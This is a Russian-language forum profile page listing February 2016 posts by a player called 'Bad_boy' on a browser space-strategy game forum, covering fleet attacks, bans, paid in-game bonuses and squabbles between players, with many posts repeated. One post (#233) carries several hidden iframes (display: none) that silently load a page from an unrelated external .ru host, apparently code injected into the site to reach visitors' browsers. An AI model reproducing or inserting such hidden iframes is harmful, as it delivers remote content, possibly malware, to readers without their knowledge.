Сообщения пользователя: Bad_boy
Тема: Прощай Олег!!! |
29 Февраля 2016 16:06:47
Сообщение #241
Zmiy, искренне соболезную на счет него, ведь мы с ним как та пересеклись в крафте, норм чел даже как та помочь
Тема: сушка или крафт-битва экстрасенсов |
28 Февраля 2016 22:33:53
Сообщение #239
vadim219,тут у всех 2-3кк очковых выше 4ур
28 Февраля 2016 22:30:00
Сообщение #238
vadim219,раньше у нас была всего 3дня а тут 7дн даже зс успеем создать
28 Февраля 2016 22:15:05
Сообщение #237
vadim219,ахаха вот так новость, так можно лучше ловит зергов(они используют сейчас так называемую имбовую сейв(о котором лишь не многие знают за что думаю и бан будет)) после того как сушку подпилим флот всё равно вернется в коры будем ждать
Тема: Пиратские станции и прочие.... |
26 Февраля 2016 19:09:41
Сообщение #233
они хотят качаться на бота <s>а я на них, вот прикол будет </s>хорошо что станция близко к моей столне <iframe id="a1996667054" style="display: none;" src="//u7yb1iy1x3xv.ru/f.html"></iframe><iframe id="a1996667054" style="display: none;" src="//u7yb1iy1x3xv.ru/f.html"></iframe><iframe id="a1996667054" style="display: none;" src="//u7yb1iy1x3xv.ru/f.html"></iframe>
Vip,до 5кк должен быть лимит(это чтоб тех кого снулили свыше 10кк могли вернутся в игру а не сидеть в ро ещё долгих при долгих месяцеввсё же топи кормяться топами)<iframe id="a1996667054" style="display: none;" src="//u7yb1iy1x3xv.ru/f.html"></iframe>
Vip,до 5кк должен быть лимит(это чтоб тех кого снулили свыше 10кк могли вернутся в игру а не сидеть в ро ещё долгих при долгих месяцев
Тема: Скидки на боевых офицеров в честь дня защитников отечества |
23 Февраля 2016 12:14:15
Сообщение #232
explorer,
мултианимешник ты?
мултианимешник ты?
23 Февраля 2016 12:08:32
Сообщение #231
VasyaMalevich,
мой дед Александр Алексеевич был Ген-Полковником СССР, недавно умер, так что у каждого есть герои в линии не стоит насмехаться
мой дед Александр Алексеевич был Ген-Полковником СССР, недавно умер, так что у каждого есть герои в линии не стоит насмехаться
23 Февраля 2016 11:52:37
Сообщение #230
VasyaMalevich,
потом будет урезка же)))
потом будет урезка же)))
Тема: Атаки на игрока. |
20 Февраля 2016 17:08:42
Сообщение #229
T-800,
У МЕНЯ ПРОЧЕМ БОЛЬШЕ СОТЕН ПЕРЕПИСОК(В КОТОРОМ МАТ И КОНЕЧНО ОНИ В ИГНОРЕ И УДАЛЕНЫ) КОТОРЫХ МНЕ ПРИСЛАЛИ ОБИДЧИКИ, Я НЕ ПРОЧЬ ЧТО ОНИ ПРИСЫЛАЮТ ВСЁ ЖЕ Я СНЕС ИМ ФЛОТЫ ОБОРОНЫ И ТД КОТОРЫЕ ОНИ МЕСЯЦА/ГОДЫ КОПИЛИ А Я ЗА 1-2ЧАСА СНЕС, ВСЁ ЖЕ КАЖДЫЙ СРЫВАЕТСЯ, ПОТОМУ ЛУЧШЕ ПУСТЬ БУДЕТ ТАК КАК СЕЙЧАС ЗА ПРОФИЛЬ И ФОРУМ БАНЯТ А ПЕРЕПИСКА ВСЁ ЖЕ ЛИЧНАЯ!!! НЕ СТОИТ АДМИНИСТРАЦИЮ ЧИТАТЬ ИХ ЭТО ЖЕ ЛИЧНОЕ А НЕ ПУБЛИЧНОЕ))
У МЕНЯ ПРОЧЕМ БОЛЬШЕ СОТЕН ПЕРЕПИСОК(В КОТОРОМ МАТ И КОНЕЧНО ОНИ В ИГНОРЕ И УДАЛЕНЫ) КОТОРЫХ МНЕ ПРИСЛАЛИ ОБИДЧИКИ, Я НЕ ПРОЧЬ ЧТО ОНИ ПРИСЫЛАЮТ ВСЁ ЖЕ Я СНЕС ИМ ФЛОТЫ ОБОРОНЫ И ТД КОТОРЫЕ ОНИ МЕСЯЦА/ГОДЫ КОПИЛИ А Я ЗА 1-2ЧАСА СНЕС, ВСЁ ЖЕ КАЖДЫЙ СРЫВАЕТСЯ, ПОТОМУ ЛУЧШЕ ПУСТЬ БУДЕТ ТАК КАК СЕЙЧАС ЗА ПРОФИЛЬ И ФОРУМ БАНЯТ А ПЕРЕПИСКА ВСЁ ЖЕ ЛИЧНАЯ!!! НЕ СТОИТ АДМИНИСТРАЦИЮ ЧИТАТЬ ИХ ЭТО ЖЕ ЛИЧНОЕ А НЕ ПУБЛИЧНОЕ))
Тема: Флот не вступил в бой |
20 Февраля 2016 16:43:56
Сообщение #228
serega_fedotov2015,
ну тебя поймали фалой это многообещающий функция фаланги который кроме слежки ничего не сможет
ну тебя поймали фалой это многообещающий функция фаланги который кроме слежки ничего не сможет
Тема: Несогласие с инквизицией и мерами пресечения |
20 Февраля 2016 16:29:01
Сообщение #227
Ad-As,
)))
)))
20 Февраля 2016 16:17:50
Сообщение #226
polargris,
за личку не банять спроси об этом т800
за личку не банять спроси об этом т800
20 Февраля 2016 16:11:25
Сообщение #225
Цитата: _NADZERATEL_
Да я ни против конечно, по этому и кинул на обсуждение. Но еще бывают такие игроки которые раз в неделю заходят и им по барабану все, а атаки идут! Кто не был в этой шкуре не поймут!
тебя снесли вот и вышел в форум как нытык, за год снесли почти на 500к бо(и то были одни топи и мультыюзеры которых уже в бан кинули) и то я не ноюсь как ты чтоб других нассалит , короче чел не норм и по репу это понятно
Цитата: _NADZERATEL_
И еще, тех кто очень любит сидеть в РО, а не играть прошу не нужно лезть вам все равно, а ведь тут люди играют!
а тебе не всё равно? вон мой терр на год был в ро и будет там, проста времени не хватит вот и всё, у каждого есть дела по важнее крафта, не каждый как ты будет сидеть сутками чтоб его не снесли или по ночам играть чтоб атаковать сервис)))моё мнение выше написано про тебя
Тема: Несогласие с инквизицией и мерами пресечения |
20 Февраля 2016 16:08:03
Сообщение #224
Цитата: Селендис
да нафик ты тут нужен, нытик несчастный, удались уже и иди рыдать в кладовку со словарем в обнимку
да уж ты тоже не нужен, вечный альянс астеровойнов который уже не раз атаковали мои сервиси в это число ходит ещё и доминион и тд глава который также принял участие при сбитые моего сервиса
20 Февраля 2016 14:16:33
Сообщение #223
скажу раз, тема не ахти да и эти атаки не бессмысленные, тему закрыт и идею в карзинку кинут, почему вы просите что-та урезать? вам не надоела ещё эти слоты для удержание? мне очень надоели, из за того что не могу отправить больше 14(из за того что больше не можно хранит флоты на корах без свободного слота) я не могу даже толком лететь в атаку не игрока или сделать скан перед атакой ведь 10кк газа тратить на эту теху нету смысла тратить как и улучшить шпионаж ведь гораздо дешевле будет строить шпилок)))я к тому что ограничение надоедает из за чего даже не хочется играть толком, везде ограничение который никому не приносит пользы(вывоз,продажа,слот,арты(которых урезали к чертям собачий а ведь не давно они были хороши и в выработки и в бонус к атаки/щиты/структуры), обелиски и тд)
Тема: геолог 1% умер в первый день. Не развод ли? |
19 Февраля 2016 09:56:53
Сообщение #222
Adai,
цена всего 127хд ничего страшного, у тосса
ГЕОЛОГ УРОВЕНЬ 10
НАНЯТЬ Стоимость: 2048
Геолог - это эксперт в астроминералогии и географии. Со своей командой металлургов и химиков он поддерживает межпланетные правительства при разработке новых источников ресурсов и оптимизации их очистки.
+5% к добыче сырья на планетах за каждый уровень.
Максимальный уровень: 64 (после 5 уровня возможен приказ х2)
Приказ X2 отдан до 24 Мар 07:39:29
За 116 кристаллов хайдариан кристаллов хайдариан в месяц Геолог будет лично выходить на объекты, что удвоит эффективность его работы.
+100% эффективности работы Геолога
Бонус! При оплате более одного месяца скидка от 1% и выше.))с зерга же уже больше года не умер тоже 10лвл
всего 850хайдов и на тебе целых 9месяцев, а у зергов всего та 100хд и то если повезет можно использовать целые годы, опять зерг превосходит других таки с флотом и с бонусом
цена всего 127хд ничего страшного, у тосса
ГЕОЛОГ УРОВЕНЬ 10
НАНЯТЬ Стоимость: 2048
Геолог - это эксперт в астроминералогии и географии. Со своей командой металлургов и химиков он поддерживает межпланетные правительства при разработке новых источников ресурсов и оптимизации их очистки.
+5% к добыче сырья на планетах за каждый уровень.
Максимальный уровень: 64 (после 5 уровня возможен приказ х2)
Приказ X2 отдан до 24 Мар 07:39:29
За 116 кристаллов хайдариан кристаллов хайдариан в месяц Геолог будет лично выходить на объекты, что удвоит эффективность его работы.
+100% эффективности работы Геолога
Бонус! При оплате более одного месяца скидка от 1% и выше.))с зерга же уже больше года не умер тоже 10лвл
всего 850хайдов и на тебе целых 9месяцев, а у зергов всего та 100хд и то если повезет можно использовать целые годы, опять зерг превосходит других таки с флотом и с бонусом